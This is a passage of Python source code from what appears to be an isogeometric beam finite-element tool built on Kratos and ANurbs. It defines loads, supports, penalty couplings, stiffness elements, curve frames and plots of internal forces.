 @property\n    def key(self):\n        return self.curve_geometry_ptr.Key()\n\n    @property\n    def model_part(self):\n        return self.model.model_part\n\n    @property\n    def t0(self):\n        return self.curve_geometry.Domain().T0()\n\n    def fix_node(self, index, directions):\n        node = self.nodes[index]\n\n        if 'x' in directions:\n            node.Fix(DISPLACEMENT_X)\n        if 'y' in directions:\n            node.Fix(DISPLACEMENT_Y)\n        if 'z' in directions:\n            node.Fix(DISPLACEMENT_Z)\n        if 'rotation' in directions:\n            node.Fix(DISPLACEMENT_ROTATION)\n\n    def add_node_load(self, index, load=[0,0,0]):\n        node = self.nodes[index]\n\n        load_properties = self.model.add_properties()\n\n        self.model.add_condition('PointLoadCondition3D1N', [node], load_properties)\n\n        node.SetSolutionStepValue(POINT_LOAD_X, load[0])\n        node.SetSolutionStepValue(POINT_LOAD_Y, load[1])\n        node.SetSolutionStepValue(POINT_LOAD_Z, load[2])\n\n    def add_node_load_moment(self, t, force=[0,0,0], moment=[0,0,0]):\n\n        curve_geometry = self.curve_geometry\n        model_part = self.model_part\n\n        integration_degree = curve_geometry.Degree() + 1\n\n        curve_geometry = self.curve_geometry\n\n        nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n        nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n        load_properties = self.model.add_properties()\n\n        condition = self.model.add_condition('IgaBeamLoadCondition', nonzero_nodes, load_properties)\n\n        condition.SetValue(SHAPE_FUNCTION_VALUES     , shape_functions[0])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n        p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n        condition.SetValue(BASE_A1, A1.tolist())\n        condition.SetValue(BASE_A2, A2.tolist())\n        condition.SetValue(BASE_A3, A3.tolist())\n        condition.SetValue(BASE_A1_1, A1_1.tolist())\n        condition.SetValue(BASE_A2_1, A2_1.tolist())\n        condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n        condition.SetValue(LOAD_VECTOR_FORCE, force)\n        condition.SetValue(LOAD_VECTOR_MOMENT, moment)\n\n        def update_condition(lam):\n            condition.SetValue(LOAD_VECTOR_FORCE, (np.array(force) * lam).tolist())\n            condition.SetValue(LOAD_VECTOR_MOMENT, (np.array(moment) * lam).tolist())\n\n        self.model.update_conditions.append(update_condition)\n\n    def 
set_node_load(self, index, load):\n        node = self.nodes[index]\n\n        node.SetSolutionStepValue(POINT_LOAD_X, load[0])\n        node.SetSolutionStepValue(POINT_LOAD_Y, load[1])\n        node.SetSolutionStepValue(POINT_LOAD_Z, load[2])\n\n        #Print load vector\n        geometry = self.model.geometry\n\n        scale = 0.2\n        if np.amax(np.absolute(load)) != 0:\n            scale = np.amax(np.absolute(load))\n\n        load_0 = [node.X, node.Y, node.Z]\n        load_vec = [node.X - load[0]/scale, node.Y - load[1]/scale, node.Z - load[2]/scale]\n\n        line_ptr = geometry.Add(an.Line3D(a=load_vec, b=load_0))\n        line_ptr.Attributes().SetLayer(f'LoadVector')\n        line_ptr.Attributes().SetColor(f'#ff0000')\n        line_ptr.Attributes().SetArrowhead('End')\n\n\n\n    def set_node_value(self, index, directions, value=0):\n        node = self.nodes[index]\n\n        if 'x' in directions:\n            node.SetSolutionStepValue(DISPLACEMENT_X, value)\n        if 'y' in directions:\n            node.SetSolutionStepValue(DISPLACEMENT_Y, value)\n        if 'z' in directions:\n            node.SetSolutionStepValue(DISPLACEMENT_Z, value)\n        if 'rotation' in directions:\n            node.SetSolutionStepValue(DISPLACEMENT_ROTATION, value)\n            # node.SetValue(DISPLACEMENT_ROTATION, value)\n\n        # node.SetSolutionStepValue(str(key), 0, value)\n        # node.SetSolutionStepValue(DISPLACEMENT_ROTATION, 0, value)\n\n    def _func(self, t):\n        curve_geometry = self.curve_geometry\n        _, r_1, r_2, r_3 = curve_geometry.DerivativesAt(t = t , order = 3)\n        a = np.cross(r_1, r_2)\n        d = np.dot(a, r_3)\n        delta = np.linalg.norm(r_1)\n        alpha = np.linalg.norm(a)\n        tau = 0\n        if alpha >= 1e-13:\n            tau = d / alpha**2\n        return -tau * delta\n\n    def frame_at(self, t):\n        curve_geometry = self.curve_geometry\n        p, r_1, r_2, r_3 = curve_geometry.DerivativesAt(t = t, order = 3)\n\n        tol = 1e-12\n        a = np.cross(r_1,r_2)\n        a_1 = cross_1(r_1, r_2, r_2, r_3)\n        d = np.dot(a, r_3)\n        delta = np.linalg.norm(r_1)\n        alpha = np.linalg.norm(a)\n        if alpha >= tol:\n            kappa = alpha / delta**3\n            tau = d / alpha**2\n\n            T = r_1 / delta \n            B = a / alpha \n            N = np.cross(B, T) \n\n            T_1 = normalized_1(r_1, r_2)\n            B_1 = normalized_1(a, a_1)\n            N_1 = cross_1(B, B_1, T, T_1)\n\n            theta = integrate.romberg(self._func, 0 , t, divmax=12)\n            theta_1 = tau * delta\n\n            a1 = r_1\n            a1_1 = r_2\n\n            a3 = -( N * np.cos(theta) + B * np.sin(theta))\n            a3_1 = -( ( + N_1 * np.cos(theta) - N * np.sin(theta) * theta_1\n                        + B_1 * np.sin(theta) + B * np.cos(theta) * theta_1))\n\n            a2 = -( -N * np.sin(theta) + B * np.cos(theta))\n            a2_1 = -( - N_1 * np.sin(theta) - N * np.cos(theta) * theta_1\n                      + B_1 * np.cos(theta) - B * np.sin(theta) * theta_1)\n        else:   # case: straight beam (zero curvature, radius of curvature -> inf)\n            T = r_1 / delta\n            a1 = r_1\n            a1_1 = r_2\n            # if np.array_equal(T,[0,0,1]):\n            if T[2] == 1:\n                a2 = np.array([0,1,0])\n            else:\n                a2 = normalized([-r_1[1] , r_1[0] , 0])\n\n            a3 = np.cross(T,a2)\n\n            a2_1 = np.array([0,0,0])\n            a3_1 = np.array([0,0,0])\n\n        # print('a1   ', a1)\n        # print('a2   ', a2)\n        # print('a3   ', a3)\n        # print('a1_1 ', a1_1)\n        # print('a2_1 ', a2_1)\n        # print('a3_1 ', a3_1)\n        return p, a1, a1_1, a2, a2_1, a3, a3_1\n\n    def add_moment(self, t, vector, material):\n        if not isinstance(material, Properties):\n            material = self.model.property(material)\n\n        curve_geometry = self.curve_geometry\n        # model_part = self.model_part\n\n        # integration_degree = curve_geometry.Degree() + 1\n\n        nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n        nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n        condition = self.model.add_element('IgaBeamMomentCondition', nonzero_nodes, material)\n\n        
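# The moment acts at a single curve parameter, so a unit weight stands in for a true integration weight (see the FIXME below).\n        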
condition.SetValue(INTEGRATION_WEIGHT, 1)  # FIXME: obtain the integration_weight from the Kratos curve.\n\n        condition.SetValue(SHAPE_FUNCTION_VALUES     , shape_functions[0])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n        _, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n        condition.SetValue(BASE_A1, A1.tolist())\n        condition.SetValue(BASE_A2, A2.tolist())\n        condition.SetValue(BASE_A3, A3.tolist())\n        condition.SetValue(BASE_A1_1, A1_1.tolist())\n        condition.SetValue(BASE_A2_1, A2_1.tolist())\n        condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n        condition.SetValue(LOAD_VECTOR_MOMENT, vector)\n\n\n    def add_support(self, t, penalty):\n\n        geometry = self.model.geometry\n\n\n        material = self.model.add_beam_properties('dummy_material',\n            area = 0, it = 0, iy = 0, iz = 0,\n            youngs_modulus = 0, shear_modulus = 0,\n            )\n\n        curve_geometry = self.curve_geometry\n        model_part = self.model_part\n\n        integration_degree = curve_geometry.Degree() + 1\n\n        curve_geometry = self.curve_geometry\n\n        nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n        nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n        condition = self.model.add_element('IgaBeamWeakBeddingCondition', nonzero_nodes, material)\n\n        condition.SetValue(SHAPE_FUNCTION_VALUES     , shape_functions[0])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n        p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n        condition.SetValue(BASE_A1, A1.tolist())\n        condition.SetValue(BASE_A2, A2.tolist())\n        condition.SetValue(BASE_A3, A3.tolist())\n        condition.SetValue(BASE_A1_1, A1_1.tolist())\n        condition.SetValue(BASE_A2_1, A2_1.tolist())\n        condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n        DISPLACEMENT_X = 0   # default\n        DISPLACEMENT_Y = 0   # default\n        DISPLACEMENT_Z = 0   # default\n        TORSION = 0          # default\n        ROTATION_2 = 0       # default\n        ROTATION_3 = 0       # default\n\n        bool_support_x = False\n        bool_support_y = False\n        bool_support_z = False\n\n        if 'displacement_x' in penalty:\n            DISPLACEMENT_X = penalty[\"displacement_x\"]\n            if DISPLACEMENT_X != 0: bool_support_x = True\n        if 'disp_x' in penalty:\n            DISPLACEMENT_X = penalty[\"disp_x\"]\n            if DISPLACEMENT_X != 0: bool_support_x = True\n        if 'displacement_y' in penalty:\n            DISPLACEMENT_Y = penalty[\"displacement_y\"]\n            if DISPLACEMENT_Y != 0: bool_support_y = True\n        if 'disp_y' in penalty:\n            DISPLACEMENT_Y = penalty[\"disp_y\"]\n            if DISPLACEMENT_Y != 0: bool_support_y = True\n        if 'displacement_z' in penalty:\n            DISPLACEMENT_Z = penalty[\"displacement_z\"]\n            if DISPLACEMENT_Z != 0: bool_support_z = True\n        if 'disp_z' in penalty:\n            DISPLACEMENT_Z = penalty[\"disp_z\"]\n            if DISPLACEMENT_Z != 0: bool_support_z = True\n        if 'torsion' in penalty:\n            TORSION = penalty[\"torsion\"]\n        if 'tors' in penalty:\n            TORSION = penalty[\"tors\"]\n        if 'rotation_2' in penalty:\n            ROTATION_2 = penalty[\"rotation_2\"]\n        if 'rot_2' in penalty:\n            ROTATION_2 = penalty[\"rot_2\"]\n        if 'rotation_3' in penalty:\n            ROTATION_3 = penalty[\"rotation_3\"]\n        if 'rot_3' in penalty:\n            ROTATION_3 = penalty[\"rot_3\"]\n\n        condition.SetValue(PENALTY_DISPLACEMENT_X, DISPLACEMENT_X)\n        condition.SetValue(PENALTY_DISPLACEMENT_Y, DISPLACEMENT_Y)\n        condition.SetValue(PENALTY_DISPLACEMENT_Z, DISPLACEMENT_Z)\n        condition.SetValue(PENALTY_TORSION, TORSION)\n        
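# Rotational penalties about the two cross-section directions (per the _2/_3 naming):\n        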
condition.SetValue(PENALTY_ROTATION_2, ROTATION_2)\n        condition.SetValue(PENALTY_ROTATION_3, ROTATION_3)\n\n        if bool_support_x:\n            line_ptr = geometry.Add(an.Line3D(a=np.add(p,np.array([0.01,0,0])), b=p))\n            line_ptr.Attributes().SetLayer(f'Support')\n            line_ptr.Attributes().SetColor(f'#00ff00')\n            line_ptr.Attributes().SetArrowhead('End')\n\n        if bool_support_y:\n            line_ptr = geometry.Add(an.Line3D(a=np.add(p,np.array([0,0.01,0])), b=p))\n            line_ptr.Attributes().SetLayer(f'Support')\n            line_ptr.Attributes().SetColor(f'#00ff00')\n            line_ptr.Attributes().SetArrowhead('End')\n\n        if bool_support_z:\n            line_ptr = geometry.Add(an.Line3D(a=np.add(p,np.array([0,0,0.01])), b=p))\n            line_ptr.Attributes().SetLayer(f'Support')\n            line_ptr.Attributes().SetColor(f'#00ff00')\n            line_ptr.Attributes().SetArrowhead('End')\n\n        return condition\n\n    def add_stiffness(self, material):\n        if not isinstance(material, Properties):\n            material = self.model.property(material)\n\n        curve_geometry = self.curve_geometry\n        # model_part = self.model_part\n\n        integration_points = []\n\n        integration_degree = curve_geometry.Degree() + 1\n\n        for span in curve_geometry.Spans():\n            if span.Length() < 1e-7:\n                continue\n\n            integration_points += an.IntegrationPoints.Points1D(\n                degree=integration_degree,\n                domain=span,\n            )\n\n        for i, (t, weight) in enumerate(integration_points):\n            nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n            nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n            element = self.model.add_element('IgaBeamADElement', nonzero_nodes, material)\n\n            element.SetValue(INTEGRATION_WEIGHT, weight)\n\n            element.SetValue(SHAPE_FUNCTION_VALUES     , shape_functions[0])\n            element.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n            element.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n            element.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n            p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n            element.SetValue(BASE_A1, A1.tolist())\n            element.SetValue(BASE_A2, A2.tolist())\n            element.SetValue(BASE_A3, A3.tolist())\n            element.SetValue(BASE_A1_1, A1_1.tolist())\n            element.SetValue(BASE_A2_1, A2_1.tolist())\n            element.SetValue(BASE_A3_1, A3_1.tolist())\n\n            element.SetValue(GAUSS_POINT, list(p))\n\n            frame = open('frames.txt', 'a')\n            frame.write( str(p.tolist()) + str(A1.tolist()) + str(A2.tolist()) + str(A3.tolist()) + '\\n')\n            frame.close()\n\n    def evaluate_point(self, t, material):\n        if not isinstance(material, Properties):\n            material = self.model.property(material)\n\n        geometry = self.model.geometry\n\n        curve_geometry = self.curve_geometry\n        model_part = self.model_part\n\n        integration_degree = curve_geometry.Degree() + 1\n\n        curve_geometry = self.curve_geometry\n\n        nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n        nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n        # condition = self.model.add_element('IgaBeamWeakBeddingCondition', nonzero_nodes, material)\n        element = self.model.add_element('IgaBeamADPostprocess', nonzero_nodes, material)\n\n\n        element.SetValue(SHAPE_FUNCTION_VALUES     , shape_functions[0])\n        element.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n        element.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n        element.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n        p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n        element.SetValue(BASE_A1, A1.tolist())\n        element.SetValue(BASE_A2, A2.tolist())\n        element.SetValue(BASE_A3, A3.tolist())\n        
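# First parameter derivatives of the local base vectors (computed by frame_at) follow:\n        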
element.SetValue(BASE_A1_1, A1_1.tolist())\n        element.SetValue(BASE_A2_1, A2_1.tolist())\n        element.SetValue(BASE_A3_1, A3_1.tolist())\n\n        # nonzero_node_indices, shape_functions = curve_geometry.ShapeFunctionsAt(t, order=3)\n\n        # nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n        # element = self.model.add_element('IgaBeamADElement', nonzero_nodes, material)\n\n        # element.SetValue(INTEGRATION_WEIGHT, weight)\n\n        # element.SetValue(SHAPE_FUNCTION_VALUES     , shape_functions[0])\n        # element.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions[1])\n        # element.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions[2])\n        # element.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions[3])\n\n        # p, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n        # element.SetValue(BASE_A1, A1.tolist())\n        # element.SetValue(BASE_A2, A2.tolist())\n        # element.SetValue(BASE_A3, A3.tolist())\n        # element.SetValue(BASE_A1_1, A1_1.tolist())\n        # element.SetValue(BASE_A2_1, A2_1.tolist())\n        # element.SetValue(BASE_A3_1, A3_1.tolist())\n\n    def t0(self):\n        act_curve_geometry = self.curve_geometry.Clone()\n        domain = act_curve_geometry.Domain()\n        return domain.T0()\n\n    def t1(self):\n        act_curve_geometry = self.curve_geometry.Clone()\n        domain = act_curve_geometry.Domain()\n        return domain.T1()\n\n    def add_coupling(self, t, other, other_t, penalty, geometry):\n        material = self.model.add_beam_properties('dummy_material',\n            area = 0, it = 0, iy = 0, iz = 0,\n            youngs_modulus = 0, shear_modulus = 0,\n            )\n\n        curve_geometry_a = self.curve_geometry\n        curve_geometry_b = other.curve_geometry\n\n        nonzero_node_indices_a, shape_functions_a = curve_geometry_a.ShapeFunctionsAt(t = t, order=3)\n        nonzero_node_indices_b, shape_functions_b = curve_geometry_b.ShapeFunctionsAt(other_t, order=3)\n\n        nonzero_nodes = []\n\n        nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices_a]\n        nonzero_nodes_b = [other.nodes[index] for index in nonzero_node_indices_b]\n\n        nonzero_nodes.extend(nonzero_nodes_b)\n\n        condition = self.model.add_element('IgaBeamADWeakCoupling', nonzero_nodes, material)\n\n        condition.SetValue(SHAPE_FUNCTION_VALUES     , shape_functions_a[0])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1, shape_functions_a[1])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2, shape_functions_a[2])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3, shape_functions_a[3])\n\n        condition.SetValue(SHAPE_FUNCTION_VALUES_B     , shape_functions_b[0])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_1_B, shape_functions_b[1])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_2_B, shape_functions_b[2])\n        condition.SetValue(SHAPE_FUNCTION_LOCAL_DER_3_B, shape_functions_b[3])\n\n        XA, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n        condition.SetValue(BASE_A1, A1.tolist())\n        condition.SetValue(BASE_A2, A2.tolist())\n        condition.SetValue(BASE_A3, A3.tolist())\n        condition.SetValue(BASE_A1_1, A1_1.tolist())\n        condition.SetValue(BASE_A2_1, A2_1.tolist())\n        condition.SetValue(BASE_A3_1, A3_1.tolist())\n\n        XB, B1, B1_1, B2, B2_1, B3, B3_1 = other.frame_at(other_t)\n\n        condition.SetValue(BASE_B1, B1.tolist())\n        condition.SetValue(BASE_B2, B2.tolist())\n        condition.SetValue(BASE_B3, B3.tolist())\n        condition.SetValue(BASE_B1_1, B1_1.tolist())\n\n        geometry.Add(an.Point3D(location=XA))\n        geometry.Add(an.Point3D(location=XB))\n\n        DISPLACEMENT_X = 0   # default\n        DISPLACEMENT_Y = 0   # default\n        DISPLACEMENT_Z = 0   # default\n        TORSION = 0          # default\n        ROTATION_2 = 0       # default\n        ROTATION_3 = 0       # default\n\n        if 'displacement_x' in penalty:\n            DISPLACEMENT_X = penalty[\"displacement_x\"]\n        if 'disp_x' in penalty:\n            DISPLACEMENT_X = penalty[\"disp_x\"]\n        if 'displacement_y' in penalty:\n            DISPLACEMENT_Y = penalty[\"displacement_y\"]\n        if 
'disp_y' in penalty:\n DISPLACEMENT_Y = penalty[\"disp_y\"]\n if 'displacement_z' in penalty:\n DISPLACEMENT_Z = penalty[\"displacement_z\"]\n if 'disp_z' in penalty:\n DISPLACEMENT_Z = penalty[\"disp_z\"]\n if 'torsion' in penalty:\n TORSION = penalty[\"torsion\"]\n if 'tors' in penalty:\n TORSION = penalty[\"tors\"]\n if 'rotation_2' in penalty:\n ROTATION_2 = penalty[\"rotation_2\"]\n if 'rot_2' in penalty:\n ROTATION_2 = penalty[\"rot_2\"]\n if 'rotation_3' in penalty:\n ROTATION_3 = penalty[\"rotation_3\"]\n if 'rot_3' in penalty:\n ROTATION_3 = penalty[\"rot_3\"]\n\n condition.SetValue(PENALTY_DISPLACEMENT_X, DISPLACEMENT_X)\n condition.SetValue(PENALTY_DISPLACEMENT_Y, DISPLACEMENT_Y)\n condition.SetValue(PENALTY_DISPLACEMENT_Z, DISPLACEMENT_Z)\n condition.SetValue(PENALTY_TORSION, TORSION)\n condition.SetValue(PENALTY_ROTATION_2, ROTATION_2)\n condition.SetValue(PENALTY_ROTATION_3, ROTATION_3)\n\n def update(self, time_step):\n geometry = self.model.geometry\n act_curve_geometry = self.curve_geometry.Clone()\n\n for i, node in enumerate(self.nodes):\n act_curve_geometry.SetPole(i, [node.X, node.Y, node.Z])\n\n act_curve_geometry_key = f'{self.key}.Step<{time_step}>'\n act_curve_geometry_ptr = geometry.Add(act_curve_geometry_key, act_curve_geometry)\n\n key = self.key.replace('.CurveGeometry3D', '')\n curve_key = f'{key}.Step<{time_step}>'\n curve_ptr = geometry.Add(curve_key, an.Curve3D(act_curve_geometry_ptr))\n\n curve_ptr.Attributes().SetLayer(f'Step<{time_step}>')\n\n domain = act_curve_geometry.Domain()\n\n for t in np.linspace(domain.T0(), domain.T1(), 10):\n _, A1, A1_1, A2, A2_1, A3, A3_1 = self.frame_at(t)\n\n T = normalized(A1)\n T_1 = normalized_1(A1, A1_1)\n\n def act_phi_at(t):\n nonzero_node_indices, shape_functions = self.curve_geometry.ShapeFunctionsAt(t, order=1)\n\n nonzero_nodes = [self.nodes[index] for index in nonzero_node_indices]\n\n act_values = np.array([node.GetSolutionStepValue(DISPLACEMENT_ROTATION) for node in nonzero_nodes])\n\n phi, phi_1 = np.dot(shape_functions, act_values)\n\n return phi, phi_1\n\n phi, phi_1 = act_phi_at(t)\n\n x, a1, a1_1 = act_curve_geometry.DerivativesAt(t, order=2)\n\n a11 = np.dot(a1, a1)\n a = np.sqrt(a11)\n\n t = normalized(a1)\n t_1 = a1_1 / a - np.dot(a1, a1_1) * a1 / a**3\n\n rod = compute_rod(t, phi)\n rod_1 = compute_rod_1(t, t_1, phi, phi_1)\n\n lam = compute_lam(T, t)\n lam_1 = compute_lam_1(T, T_1, t, t_1)\n\n rod_lam = np.dot(rod , lam )\n rod_1_lam = np.dot(rod_1, lam )\n rod_lam_1 = np.dot(rod , lam_1)\n\n a2 = np.dot(rod_lam, A2)\n a3 = np.dot(rod_lam, A3)\n\n scale = 0.25\n\n # line_ptr = geometry.Add(an.Line3D(a=x, b=x+a1*scale/np.linalg.norm(a1)))\n # line_ptr.Attributes().SetLayer(f'local coordinates a1')\n # line_ptr.Attributes().SetColor(f'#ff0000')\n # # line_ptr.Attributes().SetArrowhead('End')\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=x+a2*scale))\n line_ptr.Attributes().SetLayer(f'local coordinates a2')\n line_ptr.Attributes().SetColor(f'#00ff00')\n # line_ptr.Attributes().SetArrowhead('End')\n\n line_ptr = geometry.Add(an.Line3D(a=x, b=x+a3*scale))\n line_ptr.Attributes().SetLayer(f'local coordinates a3')\n line_ptr.Attributes().SetColor(f'#0000ff')\n # line_ptr.Attributes().SetArrowhead('End')\n\n def print_forces(self, scale):\n fname = 'kratos_data.txt'\n data = np.loadtxt(fname, dtype={'names': ('Id', 'x', 'y', 'z', 'N', 'M2', 'M3', 'Mt', 't_0', 't_1', 't_2', 'a2_0', 'a2_1', 'a2_2', 'a3_0', 'a3_1', 'a3_2'),\n 'formats': ('i4', 'f4', 'f4' , 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 
'f4', 'f4', 'f4', 'f4', 'f4')}\n                        , skiprows=0)\n\n        # print(data)\n\n        # frame = np.loadtxt('frames.txt', dtype=str)  # unused; frames.txt holds free-form text, not a table\n\n        geometry = self.model.geometry\n\n        i = len(data) -1\n        list_n = np.array([])\n        list_m2 = np.array([])\n        list_m3 = np.array([])\n        list_mt = np.array([])\n\n        while data[i][0] > 1:\n            list_n = np.append(list_n , np.absolute(data[i][4]))\n            list_m2 = np.append(list_m2, np.absolute(data[i][5]))\n            list_m3 = np.append(list_m3, np.absolute(data[i][6]))\n            list_mt = np.append(list_mt, np.absolute(data[i][7]))\n\n            # if data[i][0] == 1:\n            #     break\n            i -= 1\n\n        norm_n = np.amax(list_n)    # normalize forces\n        norm_m2 = np.amax(list_m2)\n        norm_m3 = np.amax(list_m3)\n        norm_mt = np.amax(list_mt)\n        # norm_n = 1    # do not normalize forces\n        # norm_m2 = 1\n        # norm_m3 = 1\n        # norm_mt = 1\n\n        a2 = [data['a2_0'][-1], data['a2_1'][-1], data['a2_2'][-1]]\n        a3 = [data['a3_0'][-1], data['a3_1'][-1], data['a3_2'][-1]]\n\n        n = np.dot(a3, data['N'][-1] * scale)\n        if norm_n != 0: n = np.dot(a3, data['N'][-1] * scale/norm_n)\n\n        m2 = np.dot(a2, data['M2'][-1] * scale)\n        if norm_m2 != 0: m2 = np.dot(a2, data['M2'][-1] * scale / norm_m2)\n\n        m3 = np.dot(a3, data['M3'][-1] * scale)\n        if norm_m3 != 0: m3 = np.dot(a3, data['M3'][-1] * scale / norm_m3)\n\n        mt = np.dot(a3, data['Mt'][-1] * scale)\n        if norm_mt != 0: mt = np.dot(a3, data['Mt'][-1] * scale / norm_mt)\n\n        #Print starting line of the loop\n        x_old_n = np.add([data[-1][1], data[-1][2], data[-1][3]], -n)\n        x_old_m2 = np.add([data[-1][1], data[-1][2], data[-1][3]], m2)\n        x_old_m3 = np.add([data[-1][1], data[-1][2], data[-1][3]], m3)\n        x_old_mt = np.add([data[-1][1], data[-1][2], data[-1][3]], mt)\n\n        line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_n,n), b= np.add(np.add(x_old_n,-n), n)))\n        line_ptr.Attributes().SetLayer(f'Normalkraft N1')\n        if data[i][4] <= 0:\n            line_ptr.Attributes().SetColor(f'#ff0000')   # negative forces = red\n        else:\n            line_ptr.Attributes().SetColor(f'#0000ff')   # positive forces = blue\n\n        line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_m2, -m2), b=np.add(np.add(x_old_m2, -m2), m2)))\n        line_ptr.Attributes().SetLayer(f'Moment My')\n        if data[i][5] <= 0:\n            line_ptr.Attributes().SetColor(f'#ff0000')\n        else:\n            line_ptr.Attributes().SetColor(f'#0000ff')\n\n        line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_m3, -m3), b=np.add(np.add(x_old_m3, -m3), m3)))\n        line_ptr.Attributes().SetLayer(f'Moment Mz')\n        if data[i][6] <= 0:\n            line_ptr.Attributes().SetColor(f'#ff0000')\n        else:\n            line_ptr.Attributes().SetColor(f'#0000ff')\n\n        line_ptr = geometry.Add(an.Line3D(a=np.add(x_old_mt, -mt), b=np.add(np.add(x_old_mt, -mt), mt)))\n        line_ptr.Attributes().SetLayer(f'Moment Mt')\n        if data[i][7] <= 0:\n            line_ptr.Attributes().SetColor(f'#ff0000')\n        else:\n            line_ptr.Attributes().SetColor(f'#0000ff')\n\n\n        i = len(data) -2\n        while data[i][0] >= 0:\n\n            a2 = [data['a2_0'][i], data['a2_1'][i], data['a2_2'][i]]\n            a3 = [data['a3_0'][i], data['a3_1'][i], data['a3_2'][i]]\n\n            x = [data[i][1], data[i][2], data[i][3]]\n\n            n = np.dot(a3, data['N'][i] * scale)\n            if norm_n != 0: n = np.dot(a3, data['N'][i] * scale/norm_n)\n\n            m2 = np.dot(a2, data['M2'][i] * scale)\n            if norm_m2 != 0: m2 = np.dot(a2, data['M2'][i] * scale / norm_m2)\n\n            m3 = np.dot(a3, data['M3'][i] * scale)\n            if norm_m3 != 0: m3 = np.dot(a3, data['M3'][i] * scale / norm_m3)\n\n            mt = np.dot(a3, data['Mt'][i] * scale)\n            if norm_mt != 0: mt = np.dot(a3, data['Mt'][i] * scale / norm_mt)\n\n            line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, -n)))\n            line_ptr.Attributes().SetLayer(f'Normalkraft N')\n            if 
data[i][4] <= 0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n\n            line_ptr = geometry.Add(an.Line3D(a=x_old_n, b=np.add(x, -n)))\n            line_ptr.Attributes().SetLayer(f'Normalkraft N')\n            if data[i][4] <= 0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n            x_old_n = np.add(x, -n)\n\n            line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, m2)))\n            line_ptr.Attributes().SetLayer(f'Moment My')\n            if data[i][5] <= 0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n\n            line_ptr = geometry.Add(an.Line3D(a=x_old_m2, b=np.add(x, m2)))\n            line_ptr.Attributes().SetLayer(f'Moment My')\n            if data[i][5] <= 0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n            x_old_m2 = np.add(x, m2)\n\n            line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, m3)))\n            line_ptr.Attributes().SetLayer(f'Moment Mz')\n            if data[i][6] <= 0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n\n            line_ptr = geometry.Add(an.Line3D(a=x_old_m3, b=np.add(x, m3)))\n            line_ptr.Attributes().SetLayer(f'Moment Mz')\n            if data[i][6] <= 0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n            x_old_m3 = np.add(x, m3)\n\n            line_ptr = geometry.Add(an.Line3D(a=x, b=np.add(x, mt)))\n            line_ptr.Attributes().SetLayer(f'Moment Mt')\n            if data[i][7] <= 